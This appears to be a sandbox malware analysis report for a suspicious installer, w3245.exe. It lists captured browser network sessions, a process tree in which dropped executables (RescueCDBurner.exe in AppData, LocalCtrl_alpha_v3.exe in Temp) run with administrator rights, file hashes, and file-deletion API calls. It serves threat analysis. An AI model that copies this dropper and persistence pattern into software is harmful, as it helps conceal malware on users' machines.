                                                                                                                                                                  32 | 192.168.2.4 | 50127 | 23.206.121.26 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 430 | OUT | OPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://assets.msn.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.86f8dc17.1736201940.4c38f2a3
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  33 | 192.168.2.4 | 50129 | 23.206.121.26 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 374 | OUT | POST /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 1002
                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 1002 | OUT | Data Raw: 5b 7b 22 61 67 65 22 3a 35 31 36 37 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 2c 22 6d 65 74 68 6f 64 22 3a 22 4f 50 54 49 4f 4e 53 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 33 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 32 33 2e 34 39 2e 32 35 31 2e 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                  Data Ascii: [{"age":51675,"body":{"elapsed_time":110,"method":"OPTIONS","phase":"application","protocol":"h3","referrer":"https://ntp.msn.com/","sampling_fraction":0.1,"server_ip":"23.49.251.7","status_code":200,"type":"abandoned"},"type":"network-error","url":"https
                                                                                                                                                                  2025-01-06 22:19:00 UTC | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.9af8dc17.1736201940.3c21db20
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50128 | 23.44.136.141 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:19:00 UTC | 382 | OUT | POST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                  Host: bzib.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 940
                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-06 22:19:00 UTC | 940 | OUT | Data Ascii: [{"age":59899,"body":{"elapsed_time":2183,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
2025-01-06 22:19:00 UTC | 332 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.8d872c17.1736201940.b26778
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *



                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:17:16:34
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\w3245.exe"
                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                  File size:15'806'278 bytes
                                                                                                                                                                  MD5 hash:E92B4D3EE13DA899EA0AD5B54A0094ED
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:17:16:34
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
                                                                                                                                                                  Imagebase:0xc80000
                                                                                                                                                                  File size:15'692'672 bytes
                                                                                                                                                                  MD5 hash:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:17:16:36
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:17:16:38
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:17:16:39
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:17:16:39
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:17:17:06
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                  File size:2'364'728 bytes
                                                                                                                                                                  MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:17:17:25
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                  File size:2'364'728 bytes
                                                                                                                                                                  MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:17:17:52
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:17:17:53
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:18
                                                                                                                                                                  Start time:17:17:53
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:17:17:54
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:22
                                                                                                                                                                  Start time:17:17:58
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:23
                                                                                                                                                                  Start time:17:17:58
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:24
                                                                                                                                                                  Start time:17:18:01
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff7ee2b0000
                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:25
                                                                                                                                                                  Start time:17:18:01
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff7ee2b0000
                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:27
                                                                                                                                                                  Start time:17:18:14
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:17:18:15
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:29
                                                                                                                                                                  Start time:17:18:22
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:17:18:23
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:31
                                                                                                                                                                  Start time:17:18:54
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false


                                                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced)
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00903D40
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903D53
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00903D9E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903DA8
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00903DF6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903E00
                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00903E53
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903E64
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00903F3E
                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00903F52
                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00903F79
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00903F9C
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00903FB5
                                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00903FC5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903FDA
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00904009
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090402B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090404D
                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00904064
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090406E
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00904095
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009040B0
                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 009040E6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
